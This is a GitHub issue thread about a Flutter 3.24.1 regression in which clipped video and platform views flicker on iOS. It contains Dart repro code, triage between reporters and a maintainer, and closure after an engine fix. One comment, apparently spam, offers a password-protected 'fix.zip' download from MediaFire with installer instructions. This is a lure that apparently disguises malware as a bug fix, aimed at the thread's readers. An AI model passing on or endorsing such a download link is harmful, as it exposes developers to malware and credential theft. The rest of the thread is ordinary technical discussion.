### ISSUE TITLE
[iOS] Clip not working for video on iOS in Flutter 3.24.1

### ISSUE THREAD

**Issue by wdcs-vivekmakvana** [flutter/flutter#154249]
### Steps to reproduce

I am encountering a video flickering issue specifically on iOS devices when using Flutter version 3.24.1. The videos play without any problems on Android devices. However, on iOS, the video playback exhibits noticeable flickering. This issue does not occur when using Flutter versions 3.22.3 or earlier.

1. Create a Flutter project using Flutter 3.24.1.
2. Implement video playback functionality (using the better_player_plus plugin).
3. Run the app on an iOS device.

### Expected results

Videos should play smoothly without any flickering on iOS devices, as they do on Android.

### Actual results

Videos exhibit flickering during playback on iOS devices.

### Code sample

<details open><summary>Code sample</summary>

```dart
import 'dart:math';

import 'package:better_player_plus/better_player_plus.dart';
import 'package:flutter/material.dart';

void main() {
  runApp(const MyApp());
}

class MyApp extends StatelessWidget {
  const MyApp({super.key});

  @override
  Widget build(BuildContext context) {
    return const MaterialApp(
      title: 'Video List',
      home: HomePage(),
    );
  }
}

class HomePage extends StatefulWidget {
  const HomePage({super.key});

  @override
  State<HomePage> createState() => _HomePageState();
}

class _HomePageState extends State<HomePage> {
  final List<String> _videos = [
    'https://cdn.pixabay.com/video/2022/12/18/143419-782363231_large.mp4',
    'https://videos.pexels.com/video-files/4678261/4678261-hd_1080_1920_25fps.mp4',
    'https://commondatastorage.googleapis.com/gtv-videos-bucket/sample/ForBiggerBlazes.mp4',
    'https://videos.pexels.com/video-files/4434150/4434150-hd_1080_1920_30fps.mp4',
  ];
  final _random = Random();
  List<VideoListData> dataList = [];

  @override
  void initState() {
    _setupData();
    super.initState();
  }

  void _setupData() {
    for (int index = 0; index < 10; index++) {
      var randomVideoUrl = _videos[_random.nextInt(_videos.length)];
      dataList.add(VideoListData("Video $index", randomVideoUrl));
    }
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(title: const Text("Video in list")),
      body: ListView.builder(
        itemCount: dataList.length,
        itemBuilder: (context, index) {
          VideoListData videoListData = dataList[index];
          return VideoListWidget(
            videoListData: videoListData,
            index: index,
          );
        },
      ),
    );
  }
}

class VideoListData {
  final String videoTitle;
  final String videoUrl;
  Duration? lastPosition;
  bool? wasPlaying = false;

  VideoListData(this.videoTitle, this.videoUrl);
}

class VideoListWidget extends StatefulWidget {
  final VideoListData? videoListData;
  final int index;

  const VideoListWidget({super.key, this.videoListData, required this.index});

  @override
  State<VideoListWidget> createState() => _VideoListWidgetState();
}

class _VideoListWidgetState extends State<VideoListWidget> {
  VideoListData? get videoListData => widget.videoListData;
  BetterPlayerListVideoPlayerController? controller;

  @override
  void initState() {
    super.initState();
    controller = BetterPlayerListVideoPlayerController();
  }

  @override
  void dispose() {
    super.dispose();
  }

  @override
  Widget build(BuildContext context) {
    return ClipRRect(
      child: SizedBox(
        height: MediaQuery.of(context).size.height * 0.7,
        child: ClipRRect(
          child: Column(
            children: [
              SizedBox(
                height: 50,
                child: Text('Item - ${widget.index}'),
              ),
              BetterPlayerListVideoPlayer(
                BetterPlayerDataSource(
                  BetterPlayerDataSourceType.network,
                  videoListData!.videoUrl,
                  bufferingConfiguration: const BetterPlayerBufferingConfiguration(
                      minBufferMs: 2000,
                      maxBufferMs: 10000,
                      bufferForPlaybackMs: 1000,
                      bufferForPlaybackAfterRebufferMs: 2000),
                ),
                configuration: const BetterPlayerConfiguration(
                  autoPlay: false,
                  aspectRatio: 1,
                  handleLifecycle: true,
                  fit: BoxFit.cover,
                  expandToFill: false,
                  controlsConfiguration: BetterPlayerControlsConfiguration(
                    showControls: false,
                    showControlsOnInitialize: false,
                  ),
                ),
                playFraction: 0.8,
                betterPlayerListVideoPlayerController: controller,
              ),
              const SizedBox(
                height: 50,
                child: Text('Footer'),
              ),
            ],
          ),
        ),
      ),
    );
  }
}

```

</details>

### Screenshots or Video

1. For flutter 3.22.3 Working

https://github.com/user-attachments/assets/a3a2ad76-abee-41be-a6a3-6c8f5b70edf3

2. For flutter 3.24 and 3.24.1 Not Working

https://github.com/user-attachments/assets/86346fb9-d0ee-42d9-8023-c9cc87e7c893

### Logs

-

### Flutter Doctor output

Doctor summary (to see all details, run flutter doctor -v):
[✓] Flutter (Channel stable, 3.24.1, on macOS 14.5 23F79 darwin-arm64, locale en-IN)
[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
[✓] Xcode - develop for iOS and macOS (Xcode 15.4)
[✓] Chrome - develop for the web
[✓] Android Studio (version 2024.1)
[✓] Connected device (6 available)            
[✓] Network resources

• No issues found!

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huycozy** [comment]
@wdcs-vivekmakvana [better_player_plus](https://pub.dev/packages/better_player_plus) is a 3rd party package.

I checked this using the 1st party package [video_player](https://pub.dev/packages/video_player) but didn't see the issue appear, can you also try on your device and confirm?

<details>
<summary>Sample code with video_player</summary>

```dart
import 'dart:math';

import 'package:video_player/video_player.dart';
import 'package:flutter/material.dart';

void main() {
  runApp(const MyApp());
}

class MyApp extends StatelessWidget {
  const MyApp({super.key});

  @override
  Widget build(BuildContext context) {
    return const MaterialApp(
      title: 'Video List',
      home: HomePage(),
    );
  }
}

class HomePage extends StatefulWidget {
  const HomePage({super.key});

  @override
  State<HomePage> createState() => _HomePageState();
}

class _HomePageState extends State<HomePage> {
  final List<String> _videos = [
    'https://cdn.pixabay.com/video/2022/12/18/143419-782363231_large.mp4',
    'https://videos.pexels.com/video-files/4678261/4678261-hd_1080_1920_25fps.mp4',
    'https://commondatastorage.googleapis.com/gtv-videos-bucket/sample/ForBiggerBlazes.mp4',
    'https://videos.pexels.com/video-files/4434150/4434150-hd_1080_1920_30fps.mp4',
  ];
  final _random = Random();
  List<VideoListData> dataList = [];

  @override
  void initState() {
    _setupData();
    super.initState();
  }

  void _setupData() {
    for (int index = 0; index < 10; index++) {
      var randomVideoUrl = _videos[_random.nextInt(_videos.length)];
      dataList.add(VideoListData("Video $index", randomVideoUrl));
    }
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(title: const Text("Video in list")),
      body: ListView.builder(
        itemCount: dataList.length,
        itemBuilder: (context, index) {
          VideoListData videoListData = dataList[index];
          return VideoListWidget(
            videoListData: videoListData,
            index: index,
          );
        },
      ),
    );
  }
}

class VideoListData {
  final String videoTitle;
  final String videoUrl;
  Duration? lastPosition;
  bool? wasPlaying = false;

  VideoListData(this.videoTitle, this.videoUrl);
}

class VideoListWidget extends StatefulWidget {
  final VideoListData? videoListData;
  final int index;

  const VideoListWidget({super.key, this.videoListData, required this.index});

  @override
  State<VideoListWidget> createState() => _VideoListWidgetState();
}

class _VideoListWidgetState extends State<VideoListWidget> {
  VideoListData? get videoListData => widget.videoListData;
  late VideoPlayerController controller;

  @override
  void initState() {
    super.initState();
    controller = VideoPlayerController.networkUrl(Uri.parse(videoListData!.videoUrl))
        ..initialize().then((_) {
          setState(() {});
        });
  }

  @override
  void dispose() {
    controller!.dispose();
    super.dispose();
  }

  @override
  Widget build(BuildContext context) {
    return ClipRRect(
      child: SizedBox(
        height: MediaQuery.of(context).size.height * 0.7,
        child: ClipRRect(
          child: Column(
            children: [
              SizedBox(
                height: 50,
                child: Text('Item - ${widget.index}'),
              ),
              Flexible(child: VideoPlayer(controller)),
              const SizedBox(
                height: 50,
                child: Text('Footer'),
              ),
            ],
          ),
        ),
      ),
    );
  }
}

```
</details>

If the issue only happens with `better_player_plus`, please file an issue on its repository for better support there.

**Comment by wdcs-vivekmakvana** [comment]
@huycozy  It's working fine on [video_player](https://pub.dev/packages/video_player) plugin, but can you please help me to find out, why clip is not working on Flutter latest version.

**Comment by huycozy** [comment]
Can you use my sample code above and adjust it with FittedBox and a `fit` value you passed (not sure if it's wrong with every `fit` values or a specific one) then share the updated code here? Thanks!

**Comment by wdcs-vivekmakvana** [comment]
@huycozy I have added FittedBox over VideoPlayer widget, it seems like FittedBox fit property not working.

```
import 'dart:math';

import 'package:video_player/video_player.dart';
import 'package:flutter/material.dart';

void main() {
  runApp(const MyApp());
}

class MyApp extends StatelessWidget {
  const MyApp({super.key});

  @override
  Widget build(BuildContext context) {
    return const MaterialApp(
      title: 'Video List',
      home: HomePage(),
    );
  }
}

class HomePage extends StatefulWidget {
  const HomePage({super.key});

  @override
  State<HomePage> createState() => _HomePageState();
}

class _HomePageState extends State<HomePage> {
  final List<String> _videos = [
    'https://cdn.pixabay.com/video/2022/12/18/143419-782363231_large.mp4',
    'https://videos.pexels.com/video-files/4678261/4678261-hd_1080_1920_25fps.mp4',
    'https://commondatastorage.googleapis.com/gtv-videos-bucket/sample/ForBiggerBlazes.mp4',
    'https://videos.pexels.com/video-files/4434150/4434150-hd_1080_1920_30fps.mp4',
  ];
  final _random = Random();
  List<VideoListData> dataList = [];

  @override
  void initState() {
    _setupData();
    super.initState();
  }

  void _setupData() {
    for (int index = 0; index < 10; index++) {
      var randomVideoUrl = _videos[_random.nextInt(_videos.length)];
      dataList.add(VideoListData("Video $index", randomVideoUrl));
    }
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(title: const Text("Video in list")),
      body: ListView.builder(
        itemCount: dataList.length,
        itemBuilder: (context, index) {
          VideoListData videoListData = dataList[index];
          return VideoListWidget(
            videoListData: videoListData,
            index: index,
          );
        },
      ),
    );
  }
}

class VideoListData {
  final String videoTitle;
  final String videoUrl;
  Duration? lastPosition;
  bool? wasPlaying = false;

  VideoListData(this.videoTitle, this.videoUrl);
}

class VideoListWidget extends StatefulWidget {
  final VideoListData? videoListData;
  final int index;

  const VideoListWidget({super.key, this.videoListData, required this.index});

  @override
  State<VideoListWidget> createState() => _VideoListWidgetState();
}

class _VideoListWidgetState extends State<VideoListWidget> {
  VideoListData? get videoListData => widget.videoListData;
  late VideoPlayerController controller;

  @override
  void initState() {
    super.initState();
    controller = VideoPlayerController.networkUrl(Uri.parse(videoListData!.videoUrl))
      ..initialize().then((_) {
        setState(() {});
      });
    controller.play();
  }

  @override
  void dispose() {
    controller.dispose();
    super.dispose();
  }

  @override
  Widget build(BuildContext context) {
    return ClipRRect(
      child: Column(
        mainAxisSize: MainAxisSize.min,
        crossAxisAlignment: CrossAxisAlignment.stretch,
        children: [
          SizedBox(
            height: 50,
            child: Text('Item - ${widget.index}'),
          ),
          Flexible(
            child: FittedBox(
              fit: BoxFit.cover,
              child: SizedBox(
                height: MediaQuery.of(context).size.height * 0.7,
                width: MediaQuery.of(context).size.width,
                child: VideoPlayer(controller),
              ),
            ),
          ),
          ColoredBox(
            color: Colors.green.withOpacity(0.2),
            child: const SizedBox(
              height: 50,
              child: Text('Footer'),
            ),
          ),
        ],
      ),
    );
  }
}

```

**Comment by wdcs-vivekmakvana** [comment]
I am attaching video for reference.
1. fit : BoxFit.cover

https://github.com/user-attachments/assets/94abb381-e1c1-4a13-98fe-4662a1ad4d68

2. fit: BoxFit.fitHeight

https://github.com/user-attachments/assets/2b20cddb-5867-4d2e-928a-ce6789c985e0

3. fit : BoxFit.fill

https://github.com/user-attachments/assets/45d97520-db4c-44cf-b42d-1e09557ff4aa

**Comment by huycozy** [comment]
I rechecked this with both Flutter versions 3.24.1 and 3.22.3, it seems video displays the same as the expected result on the original comment. 

Do you mean `fit` values are not affected? If so, I think this is an implementation issue when you set a limited size by SizedBox width and height inside FittedBox. 

Please also try on 3.22.3 and confirm this. If there is any different point, please be more specific so I can recheck.

**Comment by wdcs-vivekmakvana** [comment]
I tested the FittedBox's fit property with the `video_player` package in Flutter 3.24.1 and 3.22.3, and the behaviour is consistent. However, the issue persists with Better Player Plus on the latest Flutter version.

In older Flutter versions, FittedBox worked fine with `better_player_plus`. Removing the FittedBox resolves the current issue but introduces unwanted horizontal spacing around the video.

**Comment by wdcs-dimilkalathiya** [comment]
@huycozy After some more testing we were able to reproduce same issue with [webview_flutter](https://pub.dev/packages/webview_flutter) and some other packages that uses platform view

Whenever platform view interacts with safe-area (black strips) it disappears. (please see attached videos)

with flutter 3.24.1:

https://github.com/user-attachments/assets/a2bbe9a0-af15-46e3-8d3f-b886b6b6fc68

with flutter 3.22.3:

https://github.com/user-attachments/assets/7c791e07-874d-4ca8-acf7-639f357b0e2c


same thing works with flutter 3.22.3 or below versions without any issue 

we also tried ```flutter run --no-enable-impeller ``` to confirm if its just impeller specific issue but still persist perhaps flutter 3.24.0 came with platform view related changes that causing this issue?

Minimal code to reproduce issue:

```dart
return Scaffold(
      backgroundColor: Colors.black,
      body: SafeArea(
        child: PageView.builder(
          itemCount: 10,
          scrollDirection: Axis.vertical,
          itemBuilder: (context, index) {
            return const WebViewExample();
          },
        ),
      ),
```
```dart
class WebViewExample extends StatefulWidget {
  const WebViewExample({super.key});

  @override
  State<WebViewExample> createState() => _WebViewExampleState();
}

class _WebViewExampleState extends State<WebViewExample> {
  late final WebViewController controller;

  @override
  void initState() {
    super.initState();

    // #docregion webview_controller
    controller = WebViewController()
      ..setJavaScriptMode(JavaScriptMode.unrestricted)
      ..setNavigationDelegate(
        NavigationDelegate(
          onProgress: (int progress) {
            // Update loading bar.
          },
          onPageStarted: (url) {},
          onPageFinished: (url) {},
          onHttpError: (error) {},
          onWebResourceError: (error) {},
          onNavigationRequest: (request) {
            return NavigationDecision.navigate;
          },
        ),
      )
      ..loadRequest(Uri.parse('https://flutter.dev'));
    // #enddocregion webview_controller
  }

  // #docregion webview_widget
  @override
  Widget build(BuildContext context) {
    return WebViewWidget(controller: controller);
  }
  // #enddocregion webview_widget
}
```

After Adding some padding it gets even worst rendered UI just disappears :

https://github.com/user-attachments/assets/90e47d3d-dfe3-417c-b823-9baa74341aed

**Comment by huycozy** [comment]
@wdcs-dimilkalathiya Looks like you hit https://github.com/flutter/flutter/issues/153904 instead. The issue here is about clipping.

>I tested the FittedBox's fit property with the video_player package in Flutter 3.24.1 and 3.22.3, and the behaviour is consistent. However, the issue persists with Better Player Plus on the latest Flutter version.

@wdcs-vivekmakvana I would suggest you file an issue on the repository of Better Player Plus first so the author can determine the cause came from the package or Flutter framework. Or you can try finding it by looking at the package source code until you find a minimal sample code with video_player or a [pure iOS platform views](https://docs.flutter.dev/platform-integration/ios/platform-views) that will help us easier to investigate the cause. Thank you!

**Comment by hellohuanlin** [comment]
@huycozy can you help to verify if https://github.com/flutter/engine/pull/54820 fixes both examples? Thanks!

**Comment by huycozy** [comment]
@hellohuanlin Yeah, I'm currently on holiday, will give it a try when I return

**Comment by nateshmbhat** [comment]
i'm also facing the same issue with better_player_plus . will file a bug report there also. looks like some regression in platform views

**Comment by huycozy** [comment]
@wdcs-vivekmakvana @hellohuanlin I tried the original sample code with `better_player_plus` on Flutter master channel which included https://github.com/flutter/engine/pull/54820, the bug has gone. (FYI @nateshmbhat to check on Flutter master channel)

Since this is fixed on master channel, I will go ahead and close this. If anyone still experiences this on master channel, please write in comments and I will reopen this. Thanks!

**Comment by kishangohel** [comment]
@huycozy in which stable version we can expect this fix?
Can we have this fix in early release under 3.24.x version?

**Comment by huycozy** [comment]
@kishangohel You can read about it here: https://github.com/flutter/flutter/blob/master/docs/releases/Flutter-build-release-channels.md#will-a-particular-bug-fix-be-provided-in-a-hotfix-release (and whole that page for more info)
